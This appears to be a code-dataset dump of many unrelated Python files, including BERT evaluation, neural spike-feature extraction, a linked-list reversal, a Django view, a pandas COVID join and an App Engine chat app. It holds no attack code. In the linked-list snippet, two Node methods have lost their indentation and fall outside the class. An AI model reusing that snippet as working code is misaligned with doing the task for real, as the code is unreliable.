    Parse command-line arguments for ternarybert standalone evaluation.
    """
    parser = argparse.ArgumentParser(description='ternarybert evaluation')
    # FIX: the help text claimed "(Default: GPU)" while the actual default is
    # 'Ascend'; help strings now match the real defaults. Also fixed the
    # copy-pasted help for --dataset_type and the empty help for --data_name.
    parser.add_argument('--device_target', type=str, default='Ascend', choices=['Ascend', 'GPU'],
                        help='Device where the code will be implemented. (Default: Ascend)')
    parser.add_argument('--device_id', type=int, default=0, help='Device id. (Default: 0)')
    parser.add_argument('--model_dir', type=str, default='', help='The checkpoint directory of model.')
    parser.add_argument('--data_dir', type=str, default='', help='Data directory.')
    parser.add_argument('--task_name', type=str, default='sts-b', choices=['sts-b', 'qnli', 'mnli'],
                        help='The name of the task to train. (Default: sts-b)')
    parser.add_argument('--dataset_type', type=str, default='tfrecord', choices=['tfrecord', 'mindrecord'],
                        help='The dataset file format. (Default: tfrecord)')
    parser.add_argument('--batch_size', type=int, default=32, help='Batch size for evaluating')
    parser.add_argument('--data_name', type=str, default='eval.tf_record', help='Eval data file name.')
    return parser.parse_args()
def get_ckpt(ckpt_file):
    """Return the path of the most recently modified file in `ckpt_file`."""
    entries = os.listdir(ckpt_file)
    entries.sort(key=lambda name: os.path.getmtime(ckpt_file + '/' + name))
    return os.path.join(ckpt_file, entries[-1])
def do_eval_standalone(args_opt):
    """
    Run standalone evaluation of the ternary student BERT on one device.

    Loads the newest checkpoint for the task, maps its parameter names onto
    the student BertModelCLS network, then streams the eval dataset through
    the model, updating the task metric batch by batch.
    """
    ckpt_file = os.path.join(args_opt.model_dir, args_opt.task_name)
    ckpt_file = get_ckpt(ckpt_file)
    print('ckpt file:', ckpt_file)
    task = task_cfg[args_opt.task_name]
    student_net_cfg.seq_length = task.seq_length
    eval_cfg.batch_size = args_opt.batch_size
    eval_data_dir = os.path.join(args_opt.data_dir, args_opt.task_name, args_opt.data_name)
    # BUG FIX: use args_opt.device_id (the function's argument) instead of the
    # module-level `args`, which only exists when invoked via __main__.
    context.set_context(mode=context.GRAPH_MODE, device_target=args_opt.device_target,
                        device_id=args_opt.device_id)
    eval_dataset = create_dataset(batch_size=eval_cfg.batch_size,
                                  device_num=1,
                                  rank=0,
                                  do_shuffle=False,
                                  data_dir=eval_data_dir,
                                  data_type=args_opt.dataset_type,
                                  seq_length=task.seq_length,
                                  task_type=task.task_type,
                                  drop_remainder=False)
    print('eval dataset size:', eval_dataset.get_dataset_size())
    print('eval dataset batch size:', eval_dataset.get_batch_size())
    eval_model = BertModelCLS(student_net_cfg, False, task.num_labels, 0.0, phase_type='student')
    param_dict = load_checkpoint(ckpt_file)
    # Rename checkpoint parameters to match the student network's namespace.
    new_param_dict = {}
    for key, value in param_dict.items():
        new_key = re.sub('tinybert_', 'bert_', key)
        new_key = re.sub('^bert.', '', new_key)
        new_param_dict[new_key] = value
    load_param_into_net(eval_model, new_param_dict)
    eval_model.set_train(False)
    columns_list = ["input_ids", "input_mask", "segment_ids", "label_ids"]
    callback = task.metrics()
    for step, data in enumerate(eval_dataset.create_dict_iterator()):
        input_ids, input_mask, token_type_id, label_ids = (data[c] for c in columns_list)
        _, _, logits, _ = eval_model(input_ids, token_type_id, input_mask)
        callback.update(logits, label_ids)
        print('eval step: {}, {}: {}'.format(step, callback.name, callback.get_metrics()))
    metrics = callback.get_metrics()
    print('The best {}: {}'.format(callback.name, metrics))
if __name__ == '__main__':
    # Entry point: parse CLI arguments and run standalone evaluation.
    args = parse_args()
    do_eval_standalone(args)
|
4,369 | 098c91f4aa367cb389e542c0199b633e7ecd4003 | from ccapi.interfaces.bitfinex import Bitfinex
from ccapi.interfaces.bittrex import Bittrex
from ccapi.interfaces.poloniex import Poloniex
from ccapi.interfaces.bithumb import Bithumb
from ccapi.interfaces.coinone import Coinone
from ccapi.interfaces.korbit import Korbit
# from ccapis.interfaces.coinbase import Coinbase
|
4,370 | 03b38e6e2d0097d5d361b0794aba83b8e430323d | from .storage import Storage
class ConnectionManager:
    """Routes agent messages to the underlying Storage instance."""

    def __init__(self):
        self.store = Storage()

    def handle(self, msg):
        """Dispatch one incoming message by its 'type', then echo it back."""
        kind = msg['type']
        if kind in {'register', 'heartbeat'}:
            # Registration and heartbeat share the same bookkeeping path.
            self.store.reg_hb(**msg['payload'])
        elif kind == 'result':
            self.store.result(msg['payload'])
        return 'send back {}'.format(msg)

    def add_task(self, msg: dict):
        return self.store.add_task(msg)

    def get_task(self, agent_id):
        return self.store.get_task(agent_id)

    # Alias kept for callers that still use sendmsg().
    sendmsg = handle

    def get_agents(self):
        return self.store.get_agent()

    def set_task(self, task_id, state):
        self.store.tasks[task_id].state = state
4,371 | 6fe22b3f98bff1a9b775fce631ae94a4ee22b04c | """Sorting components: peak waveform features."""
import numpy as np
from spikeinterface.core.job_tools import fix_job_kwargs
from spikeinterface.core import get_channel_distances
from spikeinterface.sortingcomponents.peak_localization import LocalizeCenterOfMass, LocalizeMonopolarTriangulation
from spikeinterface.sortingcomponents.peak_pipeline import run_peak_pipeline, PipelineNode, ExtractDenseWaveforms
def compute_features_from_peaks(
    recording,
    peaks,
    feature_list=["ptp", ],
    feature_params={},
    ms_before=1.,
    ms_after=1.,
    **job_kwargs,
):
    """Extract features on the fly from the recording given a list of peaks.

    Parameters
    ----------
    recording: RecordingExtractor
        The recording extractor object.
    peaks: array
        Peaks array, as returned by detect_peaks() in "compact_numpy" way.
    feature_list: list
        Names of the features to compute (keys of `_features_class`),
        e.g. "amplitude", "ptp", "com", "energy".
    feature_params: dict
        Optional per-feature keyword arguments, keyed by feature name.
    ms_before: float
        Duration in ms before the peak used for extraction (default 1 ms).
    ms_after: float
        Duration in ms after the peak used for extraction (default 1 ms).

    Returns
    -------
    A tuple of features (even when only one is requested); each feature's
    first dimension equals peaks.shape[0].
    """
    job_kwargs = fix_job_kwargs(job_kwargs)
    # Shared parent node: dense waveform snippets around each peak.
    waveform_node = ExtractDenseWaveforms(recording, ms_before=ms_before, ms_after=ms_after, return_output=False)
    nodes = [waveform_node]
    for feature_name in feature_list:
        feature_class = _features_class[feature_name]
        params = dict(feature_params.get(feature_name, {}))
        nodes.append(feature_class(recording, parents=[waveform_node], **params))
    return run_peak_pipeline(recording, peaks, nodes, job_kwargs,
                             job_name='features_from_peaks', squeeze_output=False)
class AmplitudeFeature(PipelineNode):
    """Per-peak amplitude.

    With ``all_channels=True`` one amplitude per channel is returned
    (reduction over samples only); otherwise one scalar per peak (reduction
    over samples and channels). ``peak_sign`` selects min, max, or
    max-absolute.
    """
    def __init__(self, recording, name='amplitude_feature', return_output=True, parents=None,
                 all_channels=False, peak_sign='neg'):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.all_channels = all_channels
        self.peak_sign = peak_sign
        self._kwargs.update(dict(all_channels=all_channels, peak_sign=peak_sign))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        # waveforms: (num_peaks, num_samples, num_channels)
        if self.all_channels:
            if self.peak_sign == 'neg':
                amplitudes = np.min(waveforms, axis=1)
            elif self.peak_sign == 'pos':
                amplitudes = np.max(waveforms, axis=1)
            elif self.peak_sign == 'both':
                # BUG FIX: `axis` was previously passed to np.abs (a TypeError
                # at runtime); the reduction axis belongs to np.max, matching
                # the scalar branch below.
                amplitudes = np.max(np.abs(waveforms), axis=1)
        else:
            if self.peak_sign == 'neg':
                amplitudes = np.min(waveforms, axis=(1, 2))
            elif self.peak_sign == 'pos':
                amplitudes = np.max(waveforms, axis=(1, 2))
            elif self.peak_sign == 'both':
                amplitudes = np.max(np.abs(waveforms), axis=(1, 2))
        return amplitudes
class PeakToPeakFeature(PipelineNode):
    """Per-peak peak-to-peak amplitude.

    With ``all_channels=True`` one ptp value per channel is returned;
    otherwise one value per peak: the maximum ptp over the neighbours
    (within ``local_radius_um``) of the peak's main channel.
    """
    def __init__(self, recording, name='ptp_feature', return_output=True, parents=None,
                 local_radius_um=150., all_channels=True):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean mask of channels within local_radius_um of each channel.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self.all_channels = all_channels
        self._kwargs.update(dict(local_radius_um=local_radius_um, all_channels=all_channels))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        if self.all_channels:
            all_ptps = np.ptp(waveforms, axis=1)
        else:
            all_ptps = np.zeros(peaks.size)
            for main_chan in np.unique(peaks['channel_ind']):
                idx, = np.nonzero(peaks['channel_ind'] == main_chan)
                chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
                wfs = waveforms[idx][:, :, chan_inds]
                # BUG FIX: reduce per peak (axis=1). Previously np.max had no
                # axis, so one global scalar was broadcast to every peak on
                # this channel (compare StdPeakToPeakFeature, which reduces
                # per peak with axis=1).
                all_ptps[idx] = np.max(np.ptp(wfs, axis=1), axis=1)
        return all_ptps
class PeakToPeakLagsFeature(PipelineNode):
    """Per-peak lag (in samples) between the waveform maximum and minimum.

    With ``all_channels=True`` a lag per channel is returned; otherwise one
    lag per peak, taken from the neighbour channel with the largest
    peak-to-peak amplitude.
    """
    def __init__(self, recording, name='ptp_lag_feature', return_output=True, parents=None,
                 local_radius_um=150., all_channels=True):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.all_channels = all_channels
        self.local_radius_um = local_radius_um
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean mask of channels within local_radius_um of each channel.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(dict(local_radius_um=local_radius_um, all_channels=all_channels))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        # waveforms: (num_peaks, num_samples, num_channels)
        if self.all_channels:
            all_maxs = np.argmax(waveforms, axis=1)
            all_mins = np.argmin(waveforms, axis=1)
            all_lags = all_maxs - all_mins
        else:
            all_lags = np.zeros(peaks.size)
            for main_chan in np.unique(peaks['channel_ind']):
                idx, = np.nonzero(peaks['channel_ind'] == main_chan)
                chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
                wfs = waveforms[idx][:, :, chan_inds]
                maxs = np.argmax(wfs, axis=1)
                mins = np.argmin(wfs, axis=1)
                lags = maxs - mins
                # Per peak, keep the lag on the channel with the largest ptp.
                ptps = np.argmax(np.ptp(wfs, axis=1), axis=1)
                all_lags[idx] = lags[np.arange(len(idx)), ptps]
        return all_lags
class RandomProjectionsFeature(PipelineNode):
    """Weighted random projection of each peak's per-channel ptp amplitudes.

    Each peak's ptp vector over the neighbours of its main channel is used as
    weights for averaging the corresponding rows of ``projections``.
    """
    def __init__(self, recording, name='random_projections_feature', return_output=True, parents=None,
                 projections=None, local_radius_um=150., min_values=None):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        # projections: indexed as (channel, feature) below — assumed
        # (num_channels, num_features); TODO confirm with callers.
        self.projections = projections
        self.local_radius_um = local_radius_um
        self.min_values = min_values
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(dict(projections=projections, local_radius_um=local_radius_um, min_values=min_values))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        all_projections = np.zeros((peaks.size, self.projections.shape[1]), dtype=self._dtype)
        for main_chan in np.unique(peaks['channel_ind']):
            idx, = np.nonzero(peaks['channel_ind'] == main_chan)
            chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
            local_projections = self.projections[chan_inds, :]
            wf_ptp = (waveforms[idx][:, :, chan_inds]).ptp(axis=1)
            if self.min_values is not None:
                # Sharpen the weights: normalise by per-channel minima, power 4.
                wf_ptp = (wf_ptp/self.min_values[chan_inds])**4
            denom = np.sum(wf_ptp, axis=1)
            mask = denom != 0
            # Weighted average of projection rows; rows with zero weight stay 0.
            all_projections[idx[mask]] = np.dot(wf_ptp[mask], local_projections)/(denom[mask][:, np.newaxis])
        return all_projections
class RandomProjectionsEnergyFeature(PipelineNode):
    """Weighted random projection of each peak's per-channel L2 energies.

    Same scheme as RandomProjectionsFeature, but the weights are per-channel
    waveform norms instead of peak-to-peak amplitudes.
    """
    def __init__(self, recording, name='random_projections_energy_feature', return_output=True, parents=None,
                 projections=None, local_radius_um=150., min_values=None):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        self.neighbours_mask = self.channel_distance < local_radius_um
        # projections: indexed as (channel, feature) below — assumed
        # (num_channels, num_features); TODO confirm with callers.
        self.projections = projections
        self.min_values = min_values
        self.local_radius_um = local_radius_um
        self._kwargs.update(dict(projections=projections, min_values=min_values, local_radius_um=local_radius_um))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        all_projections = np.zeros((peaks.size, self.projections.shape[1]), dtype=self._dtype)
        for main_chan in np.unique(peaks['channel_ind']):
            idx, = np.nonzero(peaks['channel_ind'] == main_chan)
            chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
            local_projections = self.projections[chan_inds, :]
            # Per-channel L2 norm over samples for each peak waveform.
            energies = np.linalg.norm(waveforms[idx][:, :, chan_inds], axis=1)
            if self.min_values is not None:
                # Sharpen the weights: normalise by per-channel minima, power 4.
                energies = (energies/self.min_values[chan_inds])**4
            denom = np.sum(energies, axis=1)
            mask = denom != 0
            # Weighted average of projection rows; rows with zero weight stay 0.
            all_projections[idx[mask]] = np.dot(energies[mask], local_projections)/(denom[mask][:, np.newaxis])
        return all_projections
class StdPeakToPeakFeature(PipelineNode):
    """Per-peak standard deviation of peak-to-peak amplitudes over the
    neighbour channels of each peak's main channel."""
    def __init__(self, recording, name='std_ptp_feature', return_output=True, parents=None,
                 local_radius_um=150.):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean mask of channels within local_radius_um of each channel.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(dict(local_radius_um=local_radius_um))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        features = np.zeros(peaks.size)
        for chan in np.unique(peaks['channel_ind']):
            peak_idx, = np.nonzero(peaks['channel_ind'] == chan)
            neigh, = np.nonzero(self.neighbours_mask[chan])
            local_wfs = waveforms[peak_idx][:, :, neigh]
            features[peak_idx] = np.std(np.ptp(local_wfs, axis=1), axis=1)
        return features
class GlobalPeakToPeakFeature(PipelineNode):
    """Per-peak global peak-to-peak: max minus min over samples AND all
    neighbour channels of the peak's main channel."""
    def __init__(self, recording, name='global_ptp_feature', return_output=True, parents=None,
                 local_radius_um=150.):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean mask of channels within local_radius_um of each channel.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(dict(local_radius_um=local_radius_um))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        features = np.zeros(peaks.size)
        for chan in np.unique(peaks['channel_ind']):
            peak_idx, = np.nonzero(peaks['channel_ind'] == chan)
            neigh, = np.nonzero(self.neighbours_mask[chan])
            local_wfs = waveforms[peak_idx][:, :, neigh]
            highs = np.max(local_wfs, axis=(1, 2))
            lows = np.min(local_wfs, axis=(1, 2))
            features[peak_idx] = highs - lows
        return features
class KurtosisPeakToPeakFeature(PipelineNode):
    """Per-peak kurtosis of peak-to-peak amplitudes over the neighbour
    channels of each peak's main channel."""
    def __init__(self, recording, name='kurtosis_ptp_feature', return_output=True, parents=None,
                 local_radius_um=150.):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean mask of channels within local_radius_um of each channel.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(dict(local_radius_um=local_radius_um))
        self._dtype = recording.get_dtype()
    def get_dtype(self):
        return self._dtype
    def compute(self, traces, peaks, waveforms):
        # FIX: import the submodule explicitly — `import scipy` alone does not
        # guarantee `scipy.stats` is attached on older scipy versions.
        import scipy.stats
        all_ptps = np.zeros(peaks.size)
        for main_chan in np.unique(peaks['channel_ind']):
            idx, = np.nonzero(peaks['channel_ind'] == main_chan)
            chan_inds, = np.nonzero(self.neighbours_mask[main_chan])
            wfs = waveforms[idx][:, :, chan_inds]
            all_ptps[idx] = scipy.stats.kurtosis(np.ptp(wfs, axis=1), axis=1)
        return all_ptps
class EnergyFeature(PipelineNode):
    """Pipeline node computing, per peak, the Frobenius norm of its waveform
    over the channels within ``local_radius_um`` of the main channel,
    normalised by the neighbourhood size."""
    def __init__(self, recording, name='energy_feature', return_output=True, parents=None,
                 local_radius_um=50.):
        PipelineNode.__init__(self, recording, return_output=return_output, parents=parents)
        self.contact_locations = recording.get_channel_locations()
        self.channel_distance = get_channel_distances(recording)
        # Boolean neighbourhood mask: channels closer than local_radius_um.
        self.neighbours_mask = self.channel_distance < local_radius_um
        self._kwargs.update(local_radius_um=local_radius_um)
    def get_dtype(self):
        return np.dtype('float32')
    def compute(self, traces, peaks, waveforms):
        energy = np.zeros(peaks.size, dtype='float32')
        for chan in np.unique(peaks['channel_ind']):
            peak_idx, = np.nonzero(peaks['channel_ind'] == chan)
            neighbour_idx, = np.nonzero(self.neighbours_mask[chan])
            local_wfs = waveforms[peak_idx][:, :, neighbour_idx]
            # Norm over (sample, channel) axes, averaged per neighbour channel.
            energy[peak_idx] = np.linalg.norm(local_wfs, axis=(1, 2)) / neighbour_idx.size
        return energy
_features_class = {
'amplitude': AmplitudeFeature,
'ptp' : PeakToPeakFeature,
'center_of_mass' : LocalizeCenterOfMass,
'monopolar_triangulation' : LocalizeMonopolarTriangulation,
'energy' : EnergyFeature,
'std_ptp' : StdPeakToPeakFeature,
'kurtosis_ptp' : KurtosisPeakToPeakFeature,
'random_projections_ptp' : RandomProjectionsFeature,
'random_projections_energy' : RandomProjectionsEnergyFeature,
'ptp_lag' : PeakToPeakLagsFeature,
'global_ptp' : GlobalPeakToPeakFeature
} |
4,372 | 599310cfd05be28445535bc72251128ed72a9069 | class Node:
    def __init__(self, value, next=None):
        """Create a singly-linked-list node holding *value*, linked to *next*."""
        self.value = value
        self.next = next
def __str__(self):
values = []
iter = self
while iter != None:
values.append(iter.value)
iter = iter.next
return ' -> '.join(values)
@staticmethod
def makelist(values):
node = None
for i in range(len(values)-1, -1, -1):
node = Node(values[i], node)
return node
def reverse(node, s, f):
    """Reverse the sublist between 1-based positions *s* and *f* (inclusive).

    Returns the (possibly new) head of the list. If *s* == *f*, or the list is
    shorter than the requested range, the list is returned unchanged.
    """
    # Dummy head simplifies the case where the reversal starts at position 1.
    dummy = Node(0, node)
    iter = node
    start = dummy   # node just before the reversed segment
    end = node
    rstart = node   # first node of the segment (becomes its tail)
    rend = node     # last node of the segment (becomes its head)
    i = 1
    if s == f: return node
    # Advance to position s, tracking the predecessor in `start`.
    while i < s:
        start = iter
        if iter != None:
            iter = iter.next
        else:
            return node  # list shorter than s: nothing to reverse
        i += 1
    rstart = iter
    prev = iter
    if iter == None: return node
    next = iter.next
    # Pointer-reversal walk from position s up to f.
    while i < f:
        curr = next
        if next != None:
            next = next.next
        else:
            return node  # list shorter than f: abort without relinking
        curr.next = prev
        prev = curr
        i += 1
    rend = prev
    end = next  # node just after the reversed segment
    # Splice the reversed segment back into the list.
    start.next = rend
    rstart.next = end
    return dummy.next
# CLI driver: read comma-separated values and a 1-based start/finish pair,
# then print the list before and after reversing positions s..f.
values = input('Enter a list: ').split(',')
s, f = map(lambda x: int(x), input('Enter start and finish: ').split(','))
node = Node.makelist(values)
print(node)
print(reverse(node, s, f))
|
4,373 | e35a106a3852a7a004fdae6819d4075e1fe929d6 | __author__ = 'Orka'
from movie_list import MovieList
from movie_random import MovieRandom
from remove_chosen_movie_from_list import RemoveChosenMovieFromList
from save_list_to_CSV import SaveListToCSV
from length_limit import LengthLimit
# Module configuration: source/destination CSV and the open modes used below.
file_name = 'cinema.csv'  # CSV read by MovieList
function = 'r+'  # open mode for reading
filename_save = 'cinema.csv'  # CSV written back (overwrites the source file)
function_save = 'w'  # open mode for saving
class LaunchMovieLottery(object):
    """Orchestrates the movie lottery: load the list, filter by length,
    draw a random movie, and persist the list after a removal.

    NOTE(review): methods communicate through attributes set as side effects
    (return_movie_list, full_list, shorten_list), so call order matters.
    """
    def __init__(self, limit_low=None, limit_high=None):
        # Optional movie-length bounds forwarded to LengthLimit.
        self.limit_low = limit_low
        self.limit_high = limit_high
        self.full_list = None
    def movie_list(self):
        # creates movies list without sequels
        movie_list = MovieList(file_name, function)
        self.return_movie_list = movie_list.return_movie_list()
        self.full_list = movie_list.return_full_list()
        return [self.return_movie_list, self.full_list]
    def limit_list(self):
        self.movie_list()
        # limit the movie_list - returns list of movies limited to the specified length
        limit_length = LengthLimit(self.return_movie_list, self.limit_low, self.limit_high)
        self.shorten_list = limit_length.return_asked_length()
        # returns: 'No movie of this length.'
    def return_movie(self):
        """Refresh and filter the list, then draw and return a random movie."""
        self.limit_list()
        # draw a movie from movie list and print it
        movie_random = MovieRandom(self.shorten_list)
        self.temp_movie_random = movie_random.return_random_movie()
        return self.temp_movie_random
    def remove_and_save(self, the_movie):
        """Remove *the_movie* from the full list and save the result to CSV."""
        full_list = self.movie_list()[1]
        try:
            # remove chosen movie from movie list and allow the next movie in the series in next lottery
            remove = RemoveChosenMovieFromList(the_movie, full_list)
            new_movie_list = remove.remove_movie()
            # save to CSV
            save_doc = SaveListToCSV(new_movie_list, filename_save, function_save)
            save_doc.save_file()
        except ValueError:
            # Movie not exists: removal is best-effort, so swallow the error.
            pass
|
4,374 | e3fe77867926d9d82963c8125048148de6998e2b | from enum import Enum
class ImageTaggingChoice(str, Enum):
    """String-valued enum of image-tagging modes.

    BUG FIX: the original members had trailing commas, making each assigned
    value a 1-tuple. With the ``str`` mixin the tuple happened to be unpacked
    as ``str()`` arguments so the values came out right, but with a plain Enum
    the values would silently have been tuples — the commas are removed.
    """
    Disabled = "disabled"
    Basic = "basic"
    Enhanced = "enhanced"
    UnknownFutureValue = "unknownFutureValue"
|
4,375 | 4c8e3c21dd478606cf09f2e97dc9deed6597dae5 | import hashlib
import sys
def getHashcode(string):
    """Brute-force the smallest non-negative integer whose MD5 hex digest
    starts with *string*.

    Prints and returns the integer when found; returns None if no match is
    found within the search bound. BUG FIX: the original called the
    site-provided ``exit()`` inside the function, which kills the whole
    interpreter and makes the function unusable as a library; it now returns.
    """
    for i in range(10000000000):
        digest = hashlib.md5(str(i).encode('utf-8')).hexdigest()
        if digest.startswith(string):
            print(i)
            return i
    return None
if __name__ == '__main__':
getHashcode(sys.argv[1]) |
4,376 | c3ecac1c0facbf6f0905bb03fd337a7f4f5bbeff | from django.shortcuts import render
from .models import Votings
from .serializers import VotingsSerializer
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
import requests, json
@api_view(['GET'])
def votings(request):
    """List votings.

    Returns 404 when no votings are stored; otherwise serializes the queryset
    and refreshes the data against the remote myjson endpoint.

    BUG FIX: the original condition was inverted — it returned 404 when
    votings *did* exist and tried to serialize the empty queryset otherwise.
    Also adds many=True, required to serialize a queryset.
    """
    votings = Votings.objects.all()
    if not votings:
        return Response({}, status=status.HTTP_404_NOT_FOUND)
    serializer = VotingsSerializer(votings, many=True)
    # NOTE(review): passing serialized data as GET params mirrors the original
    # intent; confirm the remote endpoint actually expects these params.
    r = requests.get('https://api.myjson.com/bins/17w6e1', serializer.data)
    data = json.loads(r.text)
    return Response(data, status=status.HTTP_201_CREATED)
|
4,377 | c60971b3b0649fce8c435813de4a738f4eacda27 | import pandas as pd
import notification
def modify(nyt_url, jh_url):
    """Join NYT national case/death counts with JH 'US' recovered counts by date.

    :param nyt_url: CSV source (URL or file-like) with date, cases, deaths.
    :param jh_url: CSV source with Date, Country/Region, Recovered columns.
    :return: DataFrame with Date (YYYY-MM-DD strings), Cases, Deaths, Country,
             Recovered — or None if loading or joining fails.

    BUG FIX: the original used bare ``except`` and then fell through after an
    alert, which raised a NameError in the next step; each failure now sends
    the alert and returns None. ``except Exception`` also no longer swallows
    KeyboardInterrupt/SystemExit.
    """
    try:
        nyt_df = pd.read_csv(nyt_url,
                             header=0,
                             names=['Date', 'Cases', 'Deaths'],
                             dtype={'Cases': 'Int64', 'Deaths': 'Int64'})
        nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format="%Y-%m-%d")
    except Exception:
        alert = "Error with NYT link"
        notification.send_sns(alert)
        print(alert)
        return None
    try:
        jh_df = pd.read_csv(jh_url,
                            usecols=['Date', 'Country/Region', 'Recovered'],
                            dtype={'Recovered': 'Int64'},
                            encoding='utf8').dropna()
        jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)
        jh_df['Date'] = pd.to_datetime(jh_df['Date'], format="%Y-%m-%d")
    except Exception:
        alert = "Error with JH link"
        notification.send_sns(alert)
        print(alert)
        return None
    try:
        # Restrict JH data to the US, then inner-ish join on the date index.
        jh_us_filter = jh_df[jh_df.Country == 'US']
        covid_df = nyt_df.set_index('Date').join(
            jh_us_filter.set_index('Date')).dropna()
        covid_df.reset_index(inplace=True)
        covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')
        return covid_df
    except Exception:
        alert = "Error joining data"
        notification.send_sns(alert)
        print(alert)
        return None
|
4,378 | eca4abf706fd094a40fdfc8ea483d71b0a018ce9 |
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
    """Verifies that the key column (column 0) of a CSV table holds unique
    integer keys; duplicates are reported through Reporter."""
    def __init__(self):
        # Maps each key seen so far to True (used as a membership set).
        self.keys = {}
    def prologue(self, table_name, header):
        """Return True iff this table needs key verification."""
        if not header:
            return False
        # Keys may only be declared on the first column.
        return header[0].is_key()
    def epilogue(self):
        """No end-of-table work required."""
        pass
    def visit(self, header, columns):
        """Record the row's key; report an error if it was already seen."""
        key = int(columns[0])
        if key in self.keys:
            Reporter.error(f'중복된 키({key})가 존재합니다.')
        self.keys[key] = True
        return True
|
4,379 | 01626772b0f47987157e9f92ba2ce66a0ec2dcb4 | # socket_address_packing.py
import binascii
import socket
import struct
import sys
# Demonstrate IPv4 address packing for two sample addresses:
# dotted-quad string -> 4 packed bytes -> back to the string.
for string_address in ['192.168.1.1', '127.0.0.1']:
    packed = socket.inet_aton(string_address)  # to 4-byte network-order form
    print('Originale :', string_address)
    print('Impacchettato:', binascii.hexlify(packed))  # hex view of the bytes
    print('Spacchettato :', socket.inet_ntoa(packed))  # round-trip back
    print()
|
4,380 | 64ed3c512894902f85d619020b78338e228dddb6 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# FISL Live
# =========
# Copyright (c) 2010, Triveos Tecnologia Ltda.
# License: AGPLv3
from os.path import *
from datetime import datetime
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.ext.webapp import template
# from GAE Samples (to serialize models to JSON)
import json
# from gaeutilities.appspot.com
from appengine_utilities import sessions
class Message(db.Model):
    # Datastore entity for one chat message.
    author = db.UserProperty()  # unset for anonymous posts
    content = db.StringProperty(multiline=True)
    # NOTE(review): auto_now=True refreshes the timestamp on every put(),
    # not just at creation — confirm that is intended.
    date = db.DateTimeProperty(auto_now=True, auto_now_add=True)
class Page(webapp.RequestHandler):
    """Serves the main page (GET) and accepts new messages (POST)."""
    def get(self):
        # Choose login/logout link and display name based on auth state.
        if users.get_current_user():
            url = users.create_logout_url(self.request.uri)
            linktext = 'Logout'
            user = users.get_current_user()
        else:
            url = users.create_login_url(self.request.uri)
            linktext = 'Login'
            user = "Anonymous Coward"
        path = join(dirname(__file__), 'index.html')
        # locals() exposes url/linktext/user to the template.
        self.response.out.write(template.render(path, locals()))
    def post(self):
        # Store a new message if non-empty content was submitted.
        content = self.request.get('content')
        if content:
            message = Message()
            if users.get_current_user():
                message.author = users.get_current_user()
            message.content = self.request.get('content')
            message.put()
        self.redirect("/")
class Messages(webapp.RequestHandler):
    """JSON feed of messages; by default only those newer than the session's
    last poll, or everything when the path suffix is '/all'."""
    def get(self, mode=""):
        messages_query = Message.all().order('date')
        session = sessions.Session()
        if mode != "/all":
            # Incremental poll: only messages since the last request.
            if 'last' in session:
                messages_query.filter("date >", session['last'])
            session["last"] = datetime.utcnow()
        # NOTE(review): json.encode is not the stdlib API — presumably the
        # GAE-sample serializer mentioned in the imports; confirm.
        result = json.encode(messages_query.fetch(20))
        self.response.headers['Content-Type'] = 'application/json; charset=utf-8'
        self.response.out.write(result)
# Route table and WSGI entry point for the App Engine runtime.
if __name__ == "__main__":
    application = webapp.WSGIApplication([
        ('/', Page),
        ('/messages(.*)', Messages),  # optional '/all' suffix captured as `mode`
    ], debug=True)
    util.run_wsgi_app(application)
# vim:ts=4:sw=4:et:sm:si:ai |
4,381 | 952f8341f0fcbe6f3f3d1075ce345e61967a4336 | from setuptools import setup
setup(name='gym_asset_allocation',
version='0.0.1',
install_requires=['gym','numpy','pandas','quandl'] # And any other dependencies
) |
4,382 | e1ab4b034c949b8158c6ccc1e8e3f4a960a38c72 | import torch.nn as nn
import torch
